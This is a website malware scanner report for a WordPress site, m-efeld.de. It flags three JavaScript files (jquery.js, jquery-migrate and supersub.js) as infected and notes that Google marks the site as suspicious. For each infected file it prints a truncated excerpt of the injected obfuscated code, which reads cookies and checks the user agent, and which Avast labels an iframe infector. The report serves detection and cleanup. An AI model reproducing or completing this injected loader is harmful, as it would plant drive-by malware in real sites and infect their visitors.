New scan:

Malware Scanner report for m-efeld.de

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "m-efeld.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/13
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=m-efeld.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.m-efeld.de/
200 OK
Content-Length: 27716
Content-Type: text/html
clean
http://www.m-efeld.de/wp-includes/js/jquery/jquery.js?ver=1.10.2
200 OK
Content-Length: 94147
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 3158 bytes are skipped ...
]:9===n.nodeType?(o=n.documentElement,Math.max(n.body["scroll"+e],o["scroll"+e],n.body["offset"+e],o["offset"+e],o["client"+e])):i===t?x.css(n,r,s):x.style(n,r,i,s)},n,a?i:t,a,null)}})}),x.fn.size=function(){return this.length},x.fn.andSelf=x.fn.addBack,"object"==typeof module&&module&&"object"==typeof module.exports?module.exports=x:(e.jQuery=e.$=x,"function"==typeof define&&define.amd&&define("jquery",[],function(){return x}))})(window);
jQuery.noConflict();

Antivirus reports:

Avast
HTML:Iframe-inf

http://www.m-efeld.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 8262
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 3221 bytes are skipped ...
ector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);

Antivirus reports:

Avast
HTML:Iframe-inf

http://www.m-efeld.de/wp-content/themes/worldwide-v1-01/javascript/jquery.fitvids.js?ver=1.0
200 OK
Content-Length: 3868
Content-Type: application/javascript
clean
http://www.m-efeld.de/wp-includes/js/comment-reply.min.js?ver=3.6.1
200 OK
Content-Length: 1848
Content-Type: application/javascript
clean
http://www.m-efeld.de/wp-content/themes/worldwide-v1-01/javascript/superfish.js?ver=1.0
200 OK
Content-Length: 7021
Content-Type: application/javascript
clean
http://www.m-efeld.de/wp-content/themes/worldwide-v1-01/javascript/supersub.js?ver=1.0
200 OK
Content-Length: 4448
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 1689 bytes are skipped ...
LIs.css({
'float' : liFloat,
'width' : '100%',
'white-space' : 'normal'
})
.each(function(){
var $childUl = $('>ul',this);
var offsetDirection = $childUl.css('left')!==undefined ? 'left' : 'right';
$childUl.css(offsetDirection,emWidth);
});
});

});
};
$.fn.supersubs.defaults = {
minWidth : 9, maxWidth : 25, extraWidth : 0 };

})(jQuery);

Antivirus reports:

Avast
HTML:Iframe-inf

http://www.m-efeld.de/wp-content/themes/worldwide-v1-01/javascript/hoverIntent.js?ver=1.0
200 OK
Content-Length: 6118
Content-Type: application/javascript
clean
http://www.m-efeld.de/wp-content/themes/worldwide-v1-01/javascript/jquery.easing.js?ver=1.0
200 OK
Content-Length: 9363
Content-Type: application/javascript
clean
http://www.m-efeld.de/wp-content/themes/worldwide-v1-01/javascript/jquery.fancybox.js?ver=1.0
200 OK
Content-Length: 20560
Content-Type: application/javascript
clean
http://www.m-efeld.de/wp-content/themes/worldwide-v1-01/javascript/jquery.fancybox-media.js?ver=1.0
200 OK
Content-Length: 4111
Content-Type: application/javascript
clean
http://www.m-efeld.de/wp-content/themes/worldwide-v1-01/javascript/jquery.fancybox-thumbs.js?ver=1.0
200 OK
Content-Length: 4788
Content-Type: application/javascript
clean
http://www.m-efeld.de/wp-content/themes/worldwide-v1-01/javascript/gdl-scripts.js?ver=1.0
200 OK
Content-Length: 10080
Content-Type: application/javascript
clean
http://www.m-efeld.de/wp-content/themes/worldwide-v1-01/javascript/jquery.flexslider.js?ver=1.0
200 OK
Content-Length: 43990
Content-Type: application/javascript
clean
http://www.m-efeld.de/blog/
200 OK
Content-Length: 16286
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: m-efeld.de

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: m-efeld.de
Referer: http://www.google.com/search?q=m-efeld.de

Result:
The result is similar to the first query. There are no suspicious redirects found.